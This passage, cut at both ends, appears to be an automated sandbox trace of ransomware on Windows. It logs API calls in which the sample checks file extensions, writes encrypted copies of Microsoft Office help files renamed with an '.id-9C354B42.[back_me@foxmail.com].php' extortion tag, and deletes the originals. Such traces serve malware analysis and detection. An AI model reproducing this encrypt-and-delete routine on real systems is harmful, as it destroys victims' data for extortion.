(lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC") returned 64 [0253.371] lstrlenW (lpString=".zip") returned 4 [0253.371] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1 [0253.371] lstrlenW (lpString=".rar") returned 4 [0253.371] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1 [0253.371] lstrlenW (lpString=".bz2") returned 4 [0253.371] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1 [0253.371] lstrlenW (lpString=".7z") returned 3 [0253.371] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1 [0253.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC") returned 64 [0253.371] lstrlenW (lpString=".dbf") returned 4 [0253.371] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1 [0253.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC") returned 64 [0253.371] lstrlenW (lpString=".1cd") returned 4 [0253.371] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1 [0253.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC") returned 64 [0253.371] lstrlenW (lpString=".jpg") returned 4 [0253.371] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1 [0253.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC") returned 64 [0253.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC") returned 64 [0253.372] lstrlenW (lpString=".doc") returned 4 [0253.372] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1 [0253.372] lstrlenW (lpString=".docx") returned 5 [0253.372] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1 [0253.372] lstrlenW (lpString=".pdf") returned 4 [0253.372] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1 [0253.372] lstrlenW (lpString=".xls") returned 4 [0253.372] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1 [0253.372] lstrlenW (lpString=".xlsx") returned 5 [0253.372] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1 [0253.372] lstrlenW (lpString=".ppt") returned 4 [0253.372] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1 [0253.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC") returned 64 [0253.372] lstrlenW (lpString=".zip") returned 4 [0253.372] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1 [0253.372] lstrlenW (lpString=".rar") returned 4 [0253.372] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1 [0253.372] lstrlenW (lpString=".bz2") returned 4 [0253.372] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1 [0253.372] lstrlenW (lpString=".7z") returned 3 [0253.372] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1 [0253.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC") returned 64 [0253.372] lstrlenW (lpString=".dbf") returned 4 [0253.372] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1 [0253.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC") returned 64 [0253.372] lstrlenW (lpString=".1cd") returned 4 [0253.372] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1 [0253.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC") returned 64 [0253.372] lstrlenW (lpString=".jpg") returned 4 [0253.372] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1 [0253.373] lstrcmpiW (lpString1=".HXT", lpString2=".php") returned -1 [0253.373] lstrlenW (lpString="INFOPATH_COL.HXT") returned 16 [0253.373] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_col.hxt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0253.373] GetFileSizeEx (in: hFile=0x398, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=208) returned 1 [0253.373] CloseHandle (hObject=0x398) returned 1 [0253.373] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_col.hxt")) returned 0x20 [0253.373] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_col.hxt.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0253.373] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0253.373] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0253.373] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0253.373] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_col.hxt.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0253.374] GetLastError () returned 0x0 [0253.374] ReadFile (in: hFile=0x398, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0xd0, lpOverlapped=0x0) returned 1 [0253.376] WriteFile (in: hFile=0x3ac, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xe0, lpOverlapped=0x0) returned 1 [0253.376] ReadFile (in: hFile=0x398, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x0, lpOverlapped=0x0) returned 1 [0253.376] WriteFile (in: hFile=0x3ac, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xf4, lpOverlapped=0x0) returned 1 [0253.376] SetEndOfFile (hFile=0x3ac) returned 1 [0253.376] CloseHandle (hObject=0x3ac) returned 1 [0253.377] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0253.377] SetEndOfFile (hFile=0x398) returned 1 [0253.380] CloseHandle (hObject=0x398) returned 1 [0253.380] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0253.380] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_col.hxt")) returned 1 [0253.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT") returned 64 [0253.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT") returned 64 [0253.380] lstrlenW (lpString=".doc") returned 4 [0253.380] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1 [0253.380] lstrlenW (lpString=".docx") returned 5 [0253.380] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1 [0253.380] lstrlenW (lpString=".pdf") returned 4 [0253.380] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1 [0253.380] lstrlenW (lpString=".xls") returned 4 [0253.380] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1 [0253.380] lstrlenW (lpString=".xlsx") returned 5 [0253.380] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1 [0253.380] lstrlenW (lpString=".ppt") returned 4 [0253.380] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1 [0253.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT") returned 64 [0253.380] lstrlenW (lpString=".zip") returned 4 [0253.380] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1 [0253.380] lstrlenW (lpString=".rar") returned 4 [0253.381] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1 [0253.381] lstrlenW (lpString=".bz2") returned 4 [0253.381] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1 [0253.381] lstrlenW (lpString=".7z") returned 3 [0253.381] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1 [0253.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT") returned 64 [0253.381] lstrlenW (lpString=".dbf") returned 4 [0253.381] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1 [0253.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT") returned 64 [0253.381] lstrlenW (lpString=".1cd") returned 4 [0253.381] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1 [0253.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT") returned 64 [0253.381] lstrlenW (lpString=".jpg") returned 4 [0253.381] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1 [0253.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT") returned 64 [0253.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT") returned 64 [0253.381] lstrlenW (lpString=".doc") returned 4 [0253.381] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1 [0253.381] lstrlenW (lpString=".docx") returned 5 [0253.381] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1 [0253.381] lstrlenW (lpString=".pdf") returned 4 [0253.381] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1 [0253.381] lstrlenW (lpString=".xls") returned 4 [0253.381] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1 [0253.381] lstrlenW (lpString=".xlsx") returned 5 [0253.381] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1 [0253.381] lstrlenW (lpString=".ppt") returned 4 [0253.381] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1 [0253.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT") returned 64 [0253.381] lstrlenW (lpString=".zip") returned 4 [0253.381] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1 [0253.381] lstrlenW (lpString=".rar") returned 4 [0253.381] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1 [0253.382] lstrlenW (lpString=".bz2") returned 4 [0253.382] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1 [0253.382] lstrlenW (lpString=".7z") returned 3 [0253.382] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1 [0253.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT") returned 64 [0253.382] lstrlenW (lpString=".dbf") returned 4 [0253.382] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1 [0253.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT") returned 64 [0253.382] lstrlenW (lpString=".1cd") returned 4 [0253.382] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1 [0253.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT") returned 64 [0253.382] lstrlenW (lpString=".jpg") returned 4 [0253.382] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1 [0253.382] lstrcmpiW (lpString1=".HXK", lpString2=".php") returned -1 [0253.382] lstrlenW (lpString="INFOPATH_F_COL.HXK") returned 18 [0253.382] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_f_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0253.382] GetFileSizeEx (in: hFile=0x398, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=114) returned 1 [0253.382] CloseHandle (hObject=0x398) returned 1 [0253.382] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_f_col.hxk")) returned 0x20 [0253.383] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_f_col.hxk.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0253.383] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0253.383] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0253.383] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0253.383] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_f_col.hxk.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0253.383] GetLastError () returned 0x0 [0253.383] ReadFile (in: hFile=0x398, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x72, lpOverlapped=0x0) returned 1 [0253.384] WriteFile (in: hFile=0x3ac, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0x80, lpOverlapped=0x0) returned 1 [0253.385] ReadFile (in: hFile=0x398, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x0, lpOverlapped=0x0) returned 1 [0253.385] WriteFile (in: hFile=0x3ac, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xf8, lpOverlapped=0x0) returned 1 [0253.385] SetEndOfFile (hFile=0x3ac) returned 1 [0253.385] CloseHandle (hObject=0x3ac) returned 1 [0253.385] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0253.385] SetEndOfFile (hFile=0x398) returned 1 [0253.387] CloseHandle (hObject=0x398) returned 1 [0253.387] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0253.388] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_f_col.hxk")) returned 1 [0253.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK") returned 66 [0253.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK") returned 66 [0253.388] lstrlenW (lpString=".doc") returned 4 [0253.388] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1 [0253.388] lstrlenW (lpString=".docx") returned 5 [0253.388] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1 [0253.388] lstrlenW (lpString=".pdf") returned 4 [0253.388] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1 [0253.388] lstrlenW (lpString=".xls") returned 4 [0253.388] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1 [0253.388] lstrlenW (lpString=".xlsx") returned 5 [0253.388] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1 [0253.388] lstrlenW (lpString=".ppt") returned 4 [0253.388] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1 [0253.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK") returned 66 [0253.388] lstrlenW (lpString=".zip") returned 4 [0253.388] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1 [0253.388] lstrlenW (lpString=".rar") returned 4 [0253.388] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1 [0253.388] lstrlenW (lpString=".bz2") returned 4 [0253.388] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1 [0253.388] lstrlenW (lpString=".7z") returned 3 [0253.388] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1 [0253.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK") returned 66 [0253.388] lstrlenW (lpString=".dbf") returned 4 [0253.388] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1 [0253.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK") returned 66 [0253.388] lstrlenW (lpString=".1cd") returned 4 [0253.389] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1 [0253.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK") returned 66 [0253.389] lstrlenW (lpString=".jpg") returned 4 [0253.389] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1 [0253.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK") returned 66 [0253.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK") returned 66 [0253.389] lstrlenW (lpString=".doc") returned 4 [0253.389] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1 [0253.389] lstrlenW (lpString=".docx") returned 5 [0253.389] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1 [0253.389] lstrlenW (lpString=".pdf") returned 4 [0253.389] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1 [0253.389] lstrlenW (lpString=".xls") returned 4 [0253.389] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1 [0253.389] lstrlenW (lpString=".xlsx") returned 5 [0253.389] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1 [0253.389] lstrlenW (lpString=".ppt") returned 4 [0253.389] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1 [0253.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK") returned 66 [0253.389] lstrlenW (lpString=".zip") returned 4 [0253.389] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1 [0253.389] lstrlenW (lpString=".rar") returned 4 [0253.389] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1 [0253.389] lstrlenW (lpString=".bz2") returned 4 [0253.389] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1 [0253.389] lstrlenW (lpString=".7z") returned 3 [0253.389] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1 [0253.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK") returned 66 [0253.389] lstrlenW (lpString=".dbf") returned 4 [0253.389] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1 [0253.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK") returned 66 [0253.389] lstrlenW (lpString=".1cd") returned 4 [0253.389] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1 [0253.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK") returned 66 [0253.390] lstrlenW (lpString=".jpg") returned 4 [0253.390] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1 [0253.390] lstrcmpiW (lpString1=".HXK", lpString2=".php") returned -1 [0253.390] lstrlenW (lpString="INFOPATH_K_COL.HXK") returned 18 [0253.390] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_k_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0253.390] GetFileSizeEx (in: hFile=0x398, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=113) returned 1 [0253.390] CloseHandle (hObject=0x398) returned 1 [0253.390] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_k_col.hxk")) returned 0x20 [0253.390] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_K_COL.HXK.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_k_col.hxk.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0253.390] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0253.390] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0253.391] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0253.391] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_K_COL.HXK.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_k_col.hxk.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0253.391] GetLastError () returned 0x0 [0253.391] ReadFile (in: hFile=0x398, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x71, lpOverlapped=0x0) returned 1 [0253.454] WriteFile (in: hFile=0x3ac, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0x80, lpOverlapped=0x0) returned 1 [0253.490] ReadFile (in: hFile=0x398, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x0, lpOverlapped=0x0) returned 1 [0253.490] WriteFile (in: hFile=0x3ac, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xf8, lpOverlapped=0x0) returned 1 [0253.490] SetEndOfFile (hFile=0x3ac) returned 1 [0253.490] CloseHandle (hObject=0x3ac) returned 1 [0253.490] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0253.490] SetEndOfFile (hFile=0x398) returned 1 [0253.493] CloseHandle (hObject=0x398) returned 1 [0253.493] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_K_COL.HXK.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0253.535] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_k_col.hxk")) returned 1 [0253.657] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_K_COL.HXK") returned 66 [0253.657] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_K_COL.HXK") returned 66 [0253.657] lstrlenW (lpString=".doc") returned 4 [0253.657] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1 [0253.657] lstrlenW (lpString=".docx") returned 5 [0253.657] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1 [0253.657] lstrlenW (lpString=".pdf") returned 4 [0253.657] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1 [0253.657] lstrlenW (lpString=".xls") returned 4 [0253.657] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1 [0253.657] lstrlenW (lpString=".xlsx") returned 5 [0253.657] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1 [0253.657] lstrlenW (lpString=".ppt") returned 4 [0253.657] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1 [0253.657] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_K_COL.HXK") returned 66 [0253.657] lstrlenW (lpString=".zip") returned 4 [0253.657] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1 [0253.657] lstrlenW (lpString=".rar") returned 4 [0253.657] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1 [0253.657] lstrlenW (lpString=".bz2") returned 4 [0253.657] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1 [0253.657] lstrlenW (lpString=".7z") returned 3 [0253.657] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1 [0253.657] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_K_COL.HXK") returned 66 [0253.657] lstrlenW (lpString=".dbf") returned 4 [0253.658] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1 [0253.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_K_COL.HXK") returned 66 [0253.658] lstrlenW 